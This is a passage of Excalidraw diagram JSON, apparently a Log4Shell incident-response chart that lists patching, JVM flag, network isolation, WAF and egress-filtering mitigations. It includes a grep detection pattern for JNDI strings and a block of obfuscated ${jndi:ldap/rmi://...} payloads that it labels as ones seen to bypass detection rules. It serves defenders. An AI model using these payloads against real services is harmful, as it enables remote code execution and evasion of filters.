1162 | "x": 1248.6514577698492,
1163 | "y": 730.7097364693898,
1164 | "strokeColor": "#000000",
1165 | "backgroundColor": "#ffffff",
1166 | "width": 290.22298624461274,
1167 | "height": 264.48777863465745,
1168 | "seed": 695690176,
1169 | "groupIds": [],
1170 | "strokeSharpness": "sharp",
1171 | "boundElements": [],
1172 | "updated": 1639775213771
1173 | },
1174 | {
1175 | "id": "n5O0xTqrkmp5uz7rbM5-k",
1176 | "type": "text",
1177 | "x": 1254.0309270334953,
1178 | "y": 782.7183584001482,
1179 | "width": 273.74999999999994,
1180 | "height": 49.99999999999999,
1181 | "angle": 0,
1182 | "strokeColor": "#000000",
1183 | "backgroundColor": "#ffffff",
1184 | "fillStyle": "solid",
1185 | "strokeWidth": 1,
1186 | "strokeStyle": "dotted",
1187 | "roughness": 1,
1188 | "opacity": 80,
1189 | "groupIds": [],
1190 | "strokeSharpness": "sharp",
1191 | "seed": 161439808,
1192 | "version": 398,
1193 | "versionNonce": 1199601728,
1194 | "isDeleted": false,
1195 | "boundElements": null,
1196 | "updated": 1639775213771,
1197 | "text": "sudo egrep -I -i -r '\\$(\\{|%7B)jndi\n:(ldap[s]?|rmi|dns\n|nis|iiop|corba|nds|http):/[^\\n]+' /var/log\n",
1198 | "fontSize": 10.882870395293862,
1199 | "fontFamily": 3,
1200 | "textAlign": "center",
1201 | "verticalAlign": "top",
1202 | "baseline": 46.99999999999999,
1203 | "containerId": null,
1204 | "originalText": "sudo egrep -I -i -r '\\$(\\{|%7B)jndi\n:(ldap[s]?|rmi|dns\n|nis|iiop|corba|nds|http):/[^\\n]+' /var/log\n"
1205 | },
1206 | {
1207 | "id": "gLX93LgkoXT_5p9d1mgvK",
1208 | "type": "text",
1209 | "x": 1289.6003779394741,
1210 | "y": 740.3995205033143,
1211 | "width": 216.56549556472174,
1212 | "height": 39.55534165565697,
1213 | "angle": 0,
1214 | "strokeColor": "#000000",
1215 | "backgroundColor": "#ffffff",
1216 | "fillStyle": "solid",
1217 | "strokeWidth": 1,
1218 | "strokeStyle": "dotted",
1219 | "roughness": 1,
1220 | "opacity": 100,
1221 | "groupIds": [],
1222 | "strokeSharpness": "sharp",
1223 | "seed": 79499328,
1224 | "version": 332,
1225 | "versionNonce": 692547648,
1226 | "isDeleted": false,
1227 | "boundElements": null,
1228 | "updated": 1639775213771,
1229 | "text": "Look for JNDI payloads in \napplication & system logs",
1230 | "fontSize": 15.82213666226279,
1231 | "fontFamily": 1,
1232 | "textAlign": "center",
1233 | "verticalAlign": "top",
1234 | "baseline": 33.55534165565697,
1235 | "containerId": null,
1236 | "originalText": "Look for JNDI payloads in \napplication & system logs"
1237 | },
1238 | {
1239 | "type": "rectangle",
1240 | "version": 391,
1241 | "versionNonce": 89568192,
1242 | "isDeleted": false,
1243 | "id": "PkLRHCQ6gdWs61bCklqKZ",
1244 | "fillStyle": "solid",
1245 | "strokeWidth": 1,
1246 | "strokeStyle": "dotted",
1247 | "roughness": 1,
1248 | "opacity": 100,
1249 | "angle": 0,
1250 | "x": 825.7116557399083,
1251 | "y": 236.00611068267136,
1252 | "strokeColor": "#000000",
1253 | "backgroundColor": "#ffffff",
1254 | "width": 219.82668852018358,
1255 | "height": 121.98777863465739,
1256 | "seed": 803723328,
1257 | "groupIds": [],
1258 | "strokeSharpness": "sharp",
1259 | "boundElements": [],
1260 | "updated": 1639775213771
1261 | },
1262 | {
1263 | "id": "-i2a4dunmwGEoDaJ7tyuT",
1264 | "type": "text",
1265 | "x": 827.7168157853278,
1266 | "y": 292.92679136117175,
1267 | "width": 215,
1268 | "height": 26,
1269 | "angle": 0,
1270 | "strokeColor": "#000000",
1271 | "backgroundColor": "#ffffff",
1272 | "fillStyle": "solid",
1273 | "strokeWidth": 1,
1274 | "strokeStyle": "dotted",
1275 | "roughness": 1,
1276 | "opacity": 80,
1277 | "groupIds": [],
1278 | "strokeSharpness": "sharp",
1279 | "seed": 409751616,
1280 | "version": 271,
1281 | "versionNonce": 661612608,
1282 | "isDeleted": false,
1283 | "boundElements": null,
1284 | "updated": 1639775213772,
1285 | "text": "”-Dlog4j2.formatMsgNoLookups=True”\n",
1286 | "fontSize": 10.785532014685918,
1287 | "fontFamily": 3,
1288 | "textAlign": "center",
1289 | "verticalAlign": "top",
1290 | "baseline": 23,
1291 | "containerId": null,
1292 | "originalText": "”-Dlog4j2.formatMsgNoLookups=True”\n"
1293 | },
1294 | {
1295 | "id": "xI3JCxfhghBtP8yMt4-UM",
1296 | "type": "text",
1297 | "x": 843.6982864114575,
1298 | "y": 244.92756266858248,
1299 | "width": 183.03705874774076,
1300 | "height": 36.24496212826551,
1301 | "angle": 0,
1302 | "strokeColor": "#000000",
1303 | "backgroundColor": "#ffffff",
1304 | "fillStyle": "solid",
1305 | "strokeWidth": 1,
1306 | "strokeStyle": "dotted",
1307 | "roughness": 1,
1308 | "opacity": 100,
1309 | "groupIds": [],
1310 | "strokeSharpness": "sharp",
1311 | "seed": 1282409408,
1312 | "version": 272,
1313 | "versionNonce": 1472871360,
1314 | "isDeleted": false,
1315 | "boundElements": null,
1316 | "updated": 1639775213772,
1317 | "text": "Relaunch JVM \nwith a specific parameter",
1318 | "fontSize": 14.497984851306196,
1319 | "fontFamily": 1,
1320 | "textAlign": "center",
1321 | "verticalAlign": "top",
1322 | "baseline": 31.244962128265513,
1323 | "containerId": null,
1324 | "originalText": "Relaunch JVM \nwith a specific parameter"
1325 | },
1326 | {
1327 | "type": "text",
1328 | "version": 566,
1329 | "versionNonce": 232284224,
1330 | "isDeleted": false,
1331 | "id": "g77vc8KyHXno7YyV77UNZ",
1332 | "fillStyle": "hachure",
1333 | "strokeWidth": 1,
1334 | "strokeStyle": "dashed",
1335 | "roughness": 1,
1336 | "opacity": 100,
1337 | "angle": 0,
1338 | "x": 1694.5,
1339 | "y": 5.1250000000000995,
1340 | "strokeColor": "#000000",
1341 | "backgroundColor": "transparent",
1342 | "width": 431,
1343 | "height": 100,
1344 | "seed": 664619968,
1345 | "groupIds": [],
1346 | "strokeSharpness": "sharp",
1347 | "boundElements": [],
1348 | "updated": 1639775213772,
1349 | "fontSize": 20,
1350 | "fontFamily": 1,
1351 | "text": "Author : Loïc Castel\nhttps://www.linkedin.com/in/loicc/\nThanks to InterCERT-FR and Atos teams \n",
1352 | "baseline": 93,
1353 | "textAlign": "center",
1354 | "verticalAlign": "top",
1355 | "containerId": null,
1356 | "originalText": ""
1357 | },
1358 | {
1359 | "id": "Qco2h4oa96OARgMAqlVnz",
1360 | "type": "text",
1361 | "x": 863.0625,
1362 | "y": 310.6250000000001,
1363 | "width": 173,
1364 | "height": 42,
1365 | "angle": 0,
1366 | "strokeColor": "#c92a2a",
1367 | "backgroundColor": "#ffffff",
1368 | "fillStyle": "solid",
1369 | "strokeWidth": 1,
1370 | "strokeStyle": "dotted",
1371 | "roughness": 1,
1372 | "opacity": 80,
1373 | "groupIds": [],
1374 | "strokeSharpness": "sharp",
1375 | "seed": 1728200768,
1376 | "version": 219,
1377 | "versionNonce": 579650496,
1378 | "isDeleted": false,
1379 | "boundElements": null,
1380 | "updated": 1639775213772,
1381 | "text": "This is not recommended to \nonly rely on this mitigation\nas bypass have been identified",
1382 | "fontSize": 11.333333333333334,
1383 | "fontFamily": 1,
1384 | "textAlign": "center",
1385 | "verticalAlign": "top",
1386 | "baseline": 38,
1387 | "containerId": null,
1388 | "originalText": "This is not recommended to \nonly rely on this mitigation\nas bypass have been identified"
1389 | },
1390 | {
1391 | "id": "5CRx1zqaLs_h2AUQvPPjF",
1392 | "type": "image",
1393 | "x": 834.75,
1394 | "y": 310.3750000000001,
1395 | "width": 20.500000000000007,
1396 | "height": 40.750000000000014,
1397 | "angle": 0,
1398 | "strokeColor": "transparent",
1399 | "backgroundColor": "#ffffff",
1400 | "fillStyle": "solid",
1401 | "strokeWidth": 1,
1402 | "strokeStyle": "dotted",
1403 | "roughness": 1,
1404 | "opacity": 80,
1405 | "groupIds": [],
1406 | "strokeSharpness": "round",
1407 | "seed": 770118592,
1408 | "version": 78,
1409 | "versionNonce": 744642624,
1410 | "isDeleted": false,
1411 | "boundElements": null,
1412 | "updated": 1639775213772,
1413 | "status": "saved",
1414 | "fileId": "5fc454969dece69e77ad7ac5dd993b5ada247acb",
1415 | "scale": [
1416 | -1,
1417 | 1
1418 | ]
1419 | },
1420 | {
1421 | "type": "rectangle",
1422 | "version": 504,
1423 | "versionNonce": 62802880,
1424 | "isDeleted": false,
1425 | "id": "i2bqh6jKygnWD8X2GNBGd",
1426 | "fillStyle": "solid",
1427 | "strokeWidth": 1,
1428 | "strokeStyle": "dotted",
1429 | "roughness": 1,
1430 | "opacity": 100,
1431 | "angle": 0,
1432 | "x": 126.33665573990834,
1433 | "y": 224.13111068267142,
1434 | "strokeColor": "#c92a2a",
1435 | "backgroundColor": "#ffffff",
1436 | "width": 197.32668852018358,
1437 | "height": 84.48777863465742,
1438 | "seed": 1494639552,
1439 | "groupIds": [],
1440 | "strokeSharpness": "sharp",
1441 | "boundElements": [],
1442 | "updated": 1639775213772
1443 | },
1444 | {
1445 | "id": "WCThRd5Q7DcmW-HK2l_VZ",
1446 | "type": "text",
1447 | "x": 133,
1448 | "y": 235.6250000000001,
1449 | "width": 189,
1450 | "height": 60,
1451 | "angle": 0,
1452 | "strokeColor": "#c92a2a",
1453 | "backgroundColor": "#ffffff",
1454 | "fillStyle": "solid",
1455 | "strokeWidth": 1,
1456 | "strokeStyle": "dotted",
1457 | "roughness": 1,
1458 | "opacity": 100,
1459 | "groupIds": [],
1460 | "strokeSharpness": "sharp",
1461 | "seed": 1482733632,
1462 | "version": 127,
1463 | "versionNonce": 1434375104,
1464 | "isDeleted": false,
1465 | "boundElements": null,
1466 | "updated": 1639775213772,
1467 | "text": "Best option is to patch\nto 2.17.x (Java8) \nor 2.12.2 (Java7)",
1468 | "fontSize": 16,
1469 | "fontFamily": 1,
1470 | "textAlign": "center",
1471 | "verticalAlign": "top",
1472 | "baseline": 54,
1473 | "containerId": null,
1474 | "originalText": "Best option is to patch\nto 2.17.x (Java8) \nor 2.12.2 (Java7)"
1475 | },
1476 | {
1477 | "type": "rectangle",
1478 | "version": 537,
1479 | "versionNonce": 1700350016,
1480 | "isDeleted": false,
1481 | "id": "yTHOovNI9JD-maq_dxiPy",
1482 | "fillStyle": "solid",
1483 | "strokeWidth": 1,
1484 | "strokeStyle": "dotted",
1485 | "roughness": 1,
1486 | "opacity": 100,
1487 | "angle": 0,
1488 | "x": 363.8366557399082,
1489 | "y": 229.13111068267142,
1490 | "strokeColor": "#000000",
1491 | "backgroundColor": "#ffffff",
1492 | "width": 197.32668852018358,
1493 | "height": 169.4877786346574,
1494 | "seed": 1131457472,
1495 | "groupIds": [],
1496 | "strokeSharpness": "sharp",
1497 | "boundElements": [],
1498 | "updated": 1639775213772
1499 | },
1500 | {
1501 | "id": "JF47UCQBItgicg1G5HPG5",
1502 | "type": "text",
1503 | "x": 371.25,
1504 | "y": 240.6250000000001,
1505 | "width": 185,
1506 | "height": 160,
1507 | "angle": 0,
1508 | "strokeColor": "#000000",
1509 | "backgroundColor": "#ffffff",
1510 | "fillStyle": "solid",
1511 | "strokeWidth": 1,
1512 | "strokeStyle": "dotted",
1513 | "roughness": 1,
1514 | "opacity": 100,
1515 | "groupIds": [],
1516 | "strokeSharpness": "sharp",
1517 | "seed": 1455500224,
1518 | "version": 234,
1519 | "versionNonce": 864436288,
1520 | "isDeleted": false,
1521 | "boundElements": null,
1522 | "updated": 1639775213772,
1523 | "text": "A machine identified or \nsuspected to be\nvulnerable, if not \npatchable, can be \nisolated on a network\nzone without public\nInternet access \n(inbound or outbound)",
1524 | "fontSize": 16,
1525 | "fontFamily": 1,
1526 | "textAlign": "center",
1527 | "verticalAlign": "top",
1528 | "baseline": 154,
1529 | "containerId": null,
1530 | "originalText": "A machine identified or \nsuspected to be\nvulnerable, if not \npatchable, can be \nisolated on a network\nzone without public\nInternet access \n(inbound or outbound)"
1531 | },
1532 | {
1533 | "id": "kPadPI9yVCVFloCEcPYuK",
1534 | "type": "rectangle",
1535 | "x": 1578.75,
1536 | "y": 350.1250000000001,
1537 | "width": 553.75,
1538 | "height": 193.75,
1539 | "angle": 0,
1540 | "strokeColor": "#000000",
1541 | "backgroundColor": "#ced4da",
1542 | "fillStyle": "hachure",
1543 | "strokeWidth": 1,
1544 | "strokeStyle": "dotted",
1545 | "roughness": 1,
1546 | "opacity": 50,
1547 | "groupIds": [],
1548 | "strokeSharpness": "sharp",
1549 | "seed": 1009759168,
1550 | "version": 205,
1551 | "versionNonce": 1596777408,
1552 | "isDeleted": false,
1553 | "boundElements": null,
1554 | "updated": 1639775213772
1555 | },
1556 | {
1557 | "id": "Vqrm3_1kHKXyaM_l4JLev",
1558 | "type": "text",
1559 | "x": 1578.5,
1560 | "y": 386.03759640102845,
1561 | "width": 543,
1562 | "height": 154,
1563 | "angle": 0,
1564 | "strokeColor": "#000000",
1565 | "backgroundColor": "#ffffff",
1566 | "fillStyle": "solid",
1567 | "strokeWidth": 1,
1568 | "strokeStyle": "dotted",
1569 | "roughness": 1,
1570 | "opacity": 100,
1571 | "groupIds": [],
1572 | "strokeSharpness": "sharp",
1573 | "seed": 78549056,
1574 | "version": 277,
1575 | "versionNonce": 559167552,
1576 | "isDeleted": false,
1577 | "boundElements": null,
1578 | "updated": 1639775213772,
1579 | "text": "${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}\n${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}\n${jndi:rmi://adsasd.asdasd.asdasd}\n${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}\n${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}\n${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}\n${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}\n${${lower:j}${lower:n}${lower:d}i:${lower:ldap}://%s}\n${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://example.com/a}\n${jndi:${lower:l}${lower:d}a${lower:p}://example.com/a}\n${${env:TEST:-j}ndi${env:TEST:-:}${env:TEST:-l}dap${env:TEST:-:}//example.com}",
1580 | "fontSize": 11.16709511568123,
1581 | "fontFamily": 3,
1582 | "textAlign": "center",
1583 | "verticalAlign": "top",
1584 | "baseline": 151,
1585 | "containerId": null,
1586 | "originalText": "${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}\n${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}\n${jndi:rmi://adsasd.asdasd.asdasd}\n${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}\n${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}\n${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}\n${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}\n${${lower:j}${lower:n}${lower:d}i:${lower:ldap}://%s}\n${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://example.com/a}\n${jndi:${lower:l}${lower:d}a${lower:p}://example.com/a}\n${${env:TEST:-j}ndi${env:TEST:-:}${env:TEST:-l}dap${env:TEST:-:}//example.com}"
1587 | },
1588 | {
1589 | "id": "YG2aSjlcC0FWLTcRYuRTA",
1590 | "type": "text",
1591 | "x": 1648.75,
1592 | "y": 355.1250000000001,
1593 | "width": 416,
1594 | "height": 20,
1595 | "angle": 0,
1596 | "strokeColor": "#000000",
1597 | "backgroundColor": "#ffffff",
1598 | "fillStyle": "solid",
1599 | "strokeWidth": 1,
1600 | "strokeStyle": "dotted",
1601 | "roughness": 1,
1602 | "opacity": 100,
1603 | "groupIds": [],
1604 | "strokeSharpness": "sharp",
1605 | "seed": 1867897792,
1606 | "version": 223,
1607 | "versionNonce": 2002414528,
1608 | "isDeleted": false,
1609 | "boundElements": null,
1610 | "updated": 1639775213772,
1611 | "text": "Example of payloads seen to bypass detection rules",
1612 | "fontSize": 16,
1613 | "fontFamily": 1,
1614 | "textAlign": "center",
1615 | "verticalAlign": "top",
1616 | "baseline": 14,
1617 | "containerId": null,
1618 | "originalText": "Example of payloads seen to bypass detection rules"
1619 | },
1620 | {
1621 | "id": "3ndh9OygRMGt-cl4rY-2u",
1622 | "type": "text",
1623 | "x": 1137,
1624 | "y": 228.8750000000001,
1625 | "width": 206,
1626 | "height": 40,
1627 | "angle": 0,
1628 | "strokeColor": "#000000",
1629 | "backgroundColor": "#ced4da",
1630 | "fillStyle": "hachure",
1631 | "strokeWidth": 1,
1632 | "strokeStyle": "dotted",
1633 | "roughness": 1,
1634 | "opacity": 100,
1635 | "groupIds": [],
1636 | "strokeSharpness": "sharp",
1637 | "seed": 974235712,
1638 | "version": 44,
1639 | "versionNonce": 312684608,
1640 | "isDeleted": false,
1641 | "boundElements": null,
1642 | "updated": 1639775213772,
1643 | "text": "Add WAF rules to block \nmalicious inbound requests",
1644 | "fontSize": 16,
1645 | "fontFamily": 1,
1646 | "textAlign": "center",
1647 | "verticalAlign": "top",
1648 | "baseline": 34,
1649 | "containerId": null,
1650 | "originalText": "Add WAF rules to block \nmalicious inbound requests"
1651 | },
1652 | {
1653 | "id": "nBFYWmPAQXV-ObVJmPPt0",
1654 | "type": "text",
1655 | "x": 168.75,
1656 | "y": 743.8750000000002,
1657 | "width": 295,
1658 | "height": 20,
1659 | "angle": 0,
1660 | "strokeColor": "#000000",
1661 | "backgroundColor": "#ced4da",
1662 | "fillStyle": "hachure",
1663 | "strokeWidth": 1,
1664 | "strokeStyle": "dotted",
1665 | "roughness": 1,
1666 | "opacity": 100,
1667 | "groupIds": [],
1668 | "strokeSharpness": "sharp",
1669 | "seed": 1738014784,
1670 | "version": 259,
1671 | "versionNonce": 1083634624,
1672 | "isDeleted": false,
1673 | "boundElements": null,
1674 | "updated": 1639775213772,
1675 | "text": "Restrict egress back to the internet",
1676 | "fontSize": 16,
1677 | "fontFamily": 1,
1678 | "textAlign": "center",
1679 | "verticalAlign": "top",
1680 | "baseline": 14,
1681 | "containerId": null,
1682 | "originalText": "Restrict egress back to the internet"
1683 | },
1684 | {
1685 | "type": "rectangle",
1686 | "version": 869,
1687 | "versionNonce": 1971456064,
1688 | "isDeleted": false,
1689 | "id": "K0Ul94EJnMD2GQ6Qgtv-S",
1690 | "fillStyle": "hachure",
1691 | "strokeWidth": 1,
1692 | "strokeStyle": "dashed",
1693 | "roughness": 1,
1694 | "opacity": 100,
1695 | "angle": 0,
1696 | "x": 1704.962169944849,
1697 | "y": 94.47587414839887,
1698 | "strokeColor": "#c92a2a",
1699 | "backgroundColor": "transparent",
1700 | "width": 413.8256601103024,
1701 | "height": 110,
1702 | "seed": 1437816896,
1703 | "groupIds": [],
1704 | "strokeSharpness": "sharp",
1705 | "boundElements": [
1706 | {
1707 | "id": "FjIBXzNWpkLOUHXxxK4Ko",
1708 | "type": "text"
1709 | },
1710 | {
1711 | "id": "FjIBXzNWpkLOUHXxxK4Ko",
1712 | "type": "text"
1713 | },
1714 | {
1715 | "type": "text",
1716 | "id": "FjIBXzNWpkLOUHXxxK4Ko"
1717 | }
1718 | ],
1719 | "updated": 1639775496315
1720 | },
1721 | {
1722 | "type": "text",
1723 | "version": 726,
1724 | "versionNonce": 565287872,
1725 | "isDeleted": false,
1726 | "id": "FjIBXzNWpkLOUHXxxK4Ko",
1727 | "fillStyle": "hachure",
1728 | "strokeWidth": 1,
1729 | "strokeStyle": "dashed",
1730 | "roughness": 1,
1731 | "opacity": 100,
1732 | "angle": 0,
1733 | "x": 1734.962169944849,
1734 | "y": 136.97587414839887,
1735 | "strokeColor": "#c92a2a",
1736 | "backgroundColor": "transparent",
1737 | "width": 353.8256601103024,
1738 | "height": 25,
1739 | "seed": 335367104,
1740 | "groupIds": [],
1741 | "strokeSharpness": "sharp",
1742 | "boundElements": [],
1743 | "updated": 1639775496316,
1744 | "fontSize": 20,
1745 | "fontFamily": 1,
1746 | "text": "Firewall",
1747 | "baseline": 18,
1748 | "textAlign": "center",
1749 | "verticalAlign": "middle",
1750 | "containerId": "K0Ul94EJnMD2GQ6Qgtv-S",
1751 | "originalText": "Firewall"
1752 | },
1753 | {
1754 | "id": "6oO8dLXAUE06Zk1mv1llE",
1755 | "type": "text",
1756 | "x": 1656.75,
1757 | "y": 225.6250000000001,
1758 | "width": 434,
1759 | "height": 20,
1760 | "angle": 0,
1761 | "strokeColor": "#000000",
1762 | "backgroundColor": "#ced4da",
1763 | "fillStyle": "hachure",
1764 | "strokeWidth": 1,
1765 | "strokeStyle": "dotted",
1766 | "roughness": 1,
1767 | "opacity": 100,
1768 | "groupIds": [],
1769 | "strokeSharpness": "sharp",
1770 | "seed": 744922048,
1771 | "version": 189,
1772 | "versionNonce": 1156492224,
1773 | "isDeleted": false,
1774 | "boundElements": null,
1775 | "updated": 1639775517841,
1776 | "text": "Black lists of known IP & FQDN in filtering equipments",
1777 | "fontSize": 16,
1778 | "fontFamily": 1,
1779 | "textAlign": "center",
1780 | "verticalAlign": "top",
1781 | "baseline": 14,
1782 | "containerId": null,
1783 | "originalText": "Black lists of known IP & FQDN in filtering equipments"
1784 | },
1785 | {
1786 | "type": "text",
1787 | "version": 93,
1788 | "versionNonce": 508958784,
1789 | "isDeleted": false,
1790 | "id": "NiSEZs6lxnZ1VChI4-Cna",
1791 | "fillStyle": "hachure",
1792 | "strokeWidth": 1,
1793 | "strokeStyle": "dotted",
1794 | "roughness": 1,
1795 | "opacity": 100,
1796 | "angle": 0,
1797 | "x": 1114,
1798 | "y": 295.1250000000001,
1799 | "strokeColor": "#000000",
1800 | "backgroundColor": "#ced4da",
1801 | "width": 257,
1802 | "height": 40,
1803 | "seed": 1154938944,
1804 | "groupIds": [],
1805 | "strokeSharpness": "sharp",
1806 | "boundElements": [],
1807 | "updated": 1639775213773,
1808 | "fontSize": 16,
1809 | "fontFamily": 1,
1810 | "text": "Black lists of known IP & FQDN\nin filtering equipments",
1811 | "baseline": 34,
1812 | "textAlign": "center",
1813 | "verticalAlign": "top",
1814 | "containerId": null,
1815 | "originalText": "Black lists of known IP & FQDN\nin filtering equipments"
1816 | },
1817 | {
1818 | "id": "hri2D03CWQU55ppaIrYh0",
1819 | "type": "text",
1820 | "x": 213.75,
1821 | "y": 856.3750000000002,
1822 | "width": 195,
1823 | "height": 20,
1824 | "angle": 0,
1825 | "strokeColor": "#000000",
1826 | "backgroundColor": "#ced4da",
1827 | "fillStyle": "hachure",
1828 | "strokeWidth": 1,
1829 | "strokeStyle": "dotted",
1830 | "roughness": 1,
1831 | "opacity": 100,
1832 | "groupIds": [],
1833 | "strokeSharpness": "sharp",
1834 | "seed": 1461259200,
1835 | "version": 67,
1836 | "versionNonce": 736529344,
1837 | "isDeleted": false,
1838 | "boundElements": null,
1839 | "updated": 1639775213773,
1840 | "text": "Restrict outbound LDAP",
1841 | "fontSize": 16,
1842 | "fontFamily": 1,
1843 | "textAlign": "center",
1844 | "verticalAlign": "top",
1845 | "baseline": 14,
1846 | "containerId": null,
1847 | "originalText": "Restrict outbound LDAP"
1848 | },
1849 | {
1850 | "id": "x8R3RwN4cCUpkXCWSn2dl",
1851 | "type": "text",
1852 | "x": 193.75,
1853 | "y": 806.3750000000002,
1854 | "width": 235,
1855 | "height": 40,
1856 | "angle": 0,
1857 | "strokeColor": "#000000",
1858 | "backgroundColor": "#ced4da",
1859 | "fillStyle": "hachure",
1860 | "strokeWidth": 1,
1861 | "strokeStyle": "dotted",
1862 | "roughness": 1,
1863 | "opacity": 100,
1864 | "groupIds": [],
1865 | "strokeSharpness": "sharp",
1866 | "seed": 1736418240,
1867 | "version": 90,
1868 | "versionNonce": 1416171584,
1869 | "isDeleted": false,
1870 | "boundElements": null,
1871 | "updated": 1639775213773,
1872 | "text": "Whitelist outbound authorized\nhosts (DNS included)",
1873 | "fontSize": 16,
1874 | "fontFamily": 1,
1875 | "textAlign": "center",
1876 | "verticalAlign": "top",
1877 | "baseline": 34,
1878 | "containerId": null,
1879 | "originalText": "Whitelist outbound authorized\nhosts (DNS included)"
1880 | },
1881 | {
1882 | "id": "MjK9RLpBL74TY55hrjrMD",
1883 | "type": "text",
1884 | "x": 151.75,
1885 | "y": 777.6250000000002,
1886 | "width": 304,
1887 | "height": 20,
1888 | "angle": 0,
1889 | "strokeColor": "#000000",
1890 | "backgroundColor": "#ced4da",
1891 | "fillStyle": "hachure",
1892 | "strokeWidth": 1,
1893 | "strokeStyle": "dotted",
1894 | "roughness": 1,
1895 | "opacity": 100,
1896 | "groupIds": [],
1897 | "strokeSharpness": "sharp",
1898 | "seed": 2124423232,
1899 | "version": 75,
1900 | "versionNonce": 1319048128,
1901 | "isDeleted": false,
1902 | "boundElements": null,
1903 | "updated": 1639775213773,
1904 | "text": "Remove outbound access when possible",
1905 | "fontSize": 16,
1906 | "fontFamily": 1,
1907 | "textAlign": "center",
1908 | "verticalAlign": "top",
1909 | "baseline": 14,
1910 | "containerId": null,
1911 | "originalText": "Remove outbound access when possible"
1912 | },
1913 | {
1914 | "type": "rectangle",
1915 | "version": 628,
1916 | "versionNonce": 1029507136,
1917 | "isDeleted": false,
1918 | "id": "sf5vOacTp-bmrJ5eMdXfe",
1919 | "fillStyle": "solid",
1920 | "strokeWidth": 1,
1921 | "strokeStyle": "dotted",
1922 | "roughness": 1,
1923 | "opacity": 100,
1924 | "angle": 0,
1925 | "x": 1767.3885068776933,
1926 | "y": 728.5061106826715,
1927 | "strokeColor": "#000000",
1928 | "backgroundColor": "#ffffff",
1929 | "width": 382.7394234799214,
1930 | "height": 41.24999999999999,
1931 | "seed": 1427041216,
1932 | "groupIds": [],
1933 | "strokeSharpness": "sharp",
1934 | "boundElements": [],
1935 | "updated": 1639775213773
1936 | },
1937 | {
1938 | "type": "text",
1939 | "version": 213,
1940 | "versionNonce": 1027417024,
1941 | "isDeleted": false,
1942 | "id": "DK1lQhk6RaDMM3xNbL-lA",
1943 | "fillStyle": "hachure",
1944 | "strokeWidth": 1,
1945 | "strokeStyle": "dotted",
1946 | "roughness": 1,
1947 | "opacity": 100,
1948 | "angle": 0,
1949 | "x": 1142.75,
1950 | "y": 367.6250000000001,
1951 | "strokeColor": "#000000",
1952 | "backgroundColor": "#ced4da",
1953 | "width": 212,
1954 | "height": 60,
1955 | "seed": 1989434304,
1956 | "groupIds": [],
1957 | "strokeSharpness": "sharp",
1958 | "boundElements": [],
1959 | "updated": 1639775213773,
1960 | "fontSize": 16,
1961 | "fontFamily": 1,
1962 | "text": "SaaS WAF editors have \nprovided log4shell rules \nin prevent mode by default",
1963 | "baseline": 54,
1964 | "textAlign": "center",
1965 | "verticalAlign": "top",
1966 | "containerId": null,
1967 | "originalText": "SaaS WAF editors have \nprovided log4shell rules \nin prevent mode by default"
1968 | },
1969 | {
1970 | "id": "4TWMVfjQJEOpKSGrpRfcV",
1971 | "type": "text",
1972 | "x": 1603.25,
1973 | "y": 813.8750000000002,
1974 | "width": 99.99305555555557,
1975 | "height": 129.48741007194238,
1976 | "angle": 0,
1977 | "strokeColor": "#000000",
1978 | "backgroundColor": "#ced4da",
1979 | "fillStyle": "hachure",
1980 | "strokeWidth": 1,
1981 | "strokeStyle": "dotted",
1982 | "roughness": 1,
1983 | "opacity": 100,
1984 | "groupIds": [],
1985 | "strokeSharpness": "sharp",
1986 | "seed": 486887488,
1987 | "version": 260,
1988 | "versionNonce": 459798592,
1989 | "isDeleted": false,
1990 | "boundElements": null,
1991 | "updated": 1639775213773,
1992 | "text": "${${\r\n${::-\r\n%24%7B%3A%3A-\r\n${env:\r\n${date:\r\n${lower:\r\n${upper:\r\nhostName}\r\n}${\r\n${",
1993 | "fontSize": 11.509992006394882,
1994 | "fontFamily": 2,
1995 | "textAlign": "center",
1996 | "verticalAlign": "top",
1997 | "baseline": 127.48741007194238,
1998 | "containerId": null,
1999 | "originalText": "${${\r\n${::-\r\n%24%7B%3A%3A-\r\n${env:\r\n${date:\r\n${lower:\r\n${upper:\r\nhostName}\r\n}${\r\n${"
2000 | },
2001 | {
2002 | "id": "SPSvDYNbRoE1hAH1ktplZ",
2003 | "type": "text",
2004 | "x": 1551.75,
2005 | "y": 735.6250000000002,
2006 | "width": 202,
2007 | "height": 80,
2008 | "angle": 0,
2009 | "strokeColor": "#000000",
2010 | "backgroundColor": "#ced4da",
2011 | "fillStyle": "hachure",
2012 | "strokeWidth": 1,
2013 | "strokeStyle": "dotted",
2014 | "roughness": 1,
2015 | "opacity": 100,
2016 | "groupIds": [],
2017 | "strokeSharpness": "sharp",
2018 | "seed": 135010368,
2019 | "version": 245,
2020 | "versionNonce": 694332352,
2021 | "isDeleted": false,
2022 | "boundElements": null,
2023 | "updated": 1639775213773,
2024 | "text": "Look for specific string\n(two lasts can generate \na lot \nof false positives)",
2025 | "fontSize": 16,
2026 | "fontFamily": 1,
2027 | "textAlign": "center",
2028 | "verticalAlign": "top",
2029 | "baseline": 74,
2030 | "containerId": null,
2031 | "originalText": "Look for specific string\n(two lasts can generate \na lot \nof false positives)"
2032 | },
2033 | {
2034 | "id": "uvUX83OOn3jQ-2T8Kyhif",
2035 | "type": "text",
2036 | "x": 1592.875,
2037 | "y": 272.6250000000001,
2038 | "width": 574,
2039 | "height": 75,
2040 | "angle": 0,
2041 | "strokeColor": "#000000",
2042 | "backgroundColor": "#ced4da",
2043 | "fillStyle": "hachure",
2044 | "strokeWidth": 1,
